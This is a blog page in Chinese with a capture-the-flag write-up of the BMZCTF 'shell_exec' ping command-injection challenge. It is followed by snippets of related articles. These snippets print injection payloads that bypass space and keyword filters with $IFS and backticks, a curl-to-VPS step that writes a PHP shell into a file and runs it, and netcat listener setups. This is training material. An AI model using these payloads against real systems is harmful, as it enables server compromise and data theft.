[BMZCTF]-shell_exec

最新推荐文章于 2023-04-02 15:55:09 发布
最新推荐文章于 2023-04-02 15:55:09 发布
阅读量365 收藏
点赞数
分类专栏: php BMZCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/116904817
版权
php 同时被 2 个专栏收录
19 篇文章 1 订阅
订阅专栏
BMZCTF
13 篇文章 0 订阅
订阅专栏

[BMZCTF]-shell_exec
在这里插入图片描述
这题一进去直接显示一个页面 ,标题也直接告诉你是在执行ping命令,再看看源代码,可以看到执行指令的具体形式
在这里插入图片描述
不出意外这里靠的是命令执行,这里有篇大佬写的总结
在这里插入图片描述
这里发现;被过滤了,但是|可以
在这里插入图片描述
他还是会报错,这里拿去自己的虚拟机跑了一下,发现了问题所在,他根本就,,没有执行到ping
在这里插入图片描述
这就有点麻烦了,他先执行了我们希望执行的命令,导致没有执行ping,所以网页上会报错,这就有点难受了,这里也没有什么绕过方法

这时候才注意到后面有个2>&1,找到一篇如何理解Linux shell中的“2>&1”
在这里插入图片描述
2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件,简单来说就是可以指定一个文本记录错误信息

这里再说一下上面大佬文章中写到的,反引号可以把括起来的字符当做命令执行
在这里插入图片描述
既然如此我们可以在自己的虚拟机上试试
在这里插入图片描述
看起来是可以的,拿到题目里试试
在这里插入图片描述
访问test.txt文件成功看到执行结果
在这里插入图片描述
接下来执行cat /flag,但是这题过滤了cat,flag和空格,所以我们再借鉴上面文章提到的方法进行绕过
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

lmonstergg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1409
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz
最新发布
08-17
在标题提及的"mysql-shell-8.0.30-linux-glibc2.12-x86-64bit.tar.gz"文件中,我们获取的是适用于Linux系统(glibc2.12版本)的64位MySQL Shell版本8.0.30,这是MySQL数据库8.0系列的一个重要组件。 MySQL 8.0相较...
关于BMZCTFshell_exec的解法详解
永远是少年
01-15 1163
BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此写了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
[CTF]命令执行无回显利用
cosmoslin的博客
02-21 7534
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
CTF—命令执行总结
qq_45927819的博客
11-13 3807
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
【CTF】命令执行RCE
qq_53099119的博客
04-02 2629
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
k_shell.rar_K-shell_k-shell MATL_k-shell matlab_k_shell_matlab k
07-13
根据k-shell算法,对网络进行划分,得到每一层的子网
MongoDB(mongodb-org-shell_5.0.4_amd64.deb)
11-20
MongoDB Community Server(mongodb-org-shell_5.0.4_amd64.deb)适用于适用于Debian10 MongoDB是一个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。 MongoDB是一...
.-Shell_Script.sh:仅通过
03-02
标题中的“.-Shell_Script.sh”表明我们关注的是一个Shell脚本文件,它可能是用于Linux或Unix系统的自动化任务。Shell脚本是用Bash或其他Shell语言编写的程序,允许用户执行一系列命令,进行文件操作,系统管理等。...
sjlkaiyuan-startJava-master_shell_
10-01
【标题】"sjlkaiyuan-startJava-master_shell_" 暗示这是一个关于 JavaSE 入门学习的项目,其中可能包含使用 Shell 脚本进行辅助教学或自动化任务的内容。这个项目可能是一个 Git 仓库的克隆,名字中的 "master" ...
BMZCTF shell_exec
qq_26243045的博客
11-28 480
考点:命令执行 打开题目能猜出来是考命令执行。 做了半天发现底部有个语法提示。 过滤了很多命令,但是head还可以执行。用在取反符号中写入命令,完整payload `head$IFS$9/fla?$IFS$9>1.txt` 拿到flag ...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 1696
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
[ACTF2020 新生赛]Exec
yuanqiqi_的博客
09-01 1211
萌新记录一下自己的CTF——web刷题之旅
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1581
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1516
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
BMZCTFshell_exec
末初的CSDN博客
01-24 770
http://bmzclub.cn/challenges#shell_exec 命令执行绕过 ping -c 2 "$_POST[ip]" 2>&1 2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件即以下这种形式 ping -c 2 "command>1.txt" 2>&1 fuzz一下发现同时还过滤了很多关键字符,但是发现没有过滤反引号,即可构造 `ls>1.txt`
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
php fpm模式 不能运行shell_exec
06-06
和 `exec()` 函数一样,`shell_exec()` 函数也可以执行系统命令,并返回其输出结果。因此,在使用 `shell_exec()` 函数时需要特别小心,以避免安全漏洞。 默认情况下,PHP FPM 会禁用一些危险的函数,包括 `shell_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值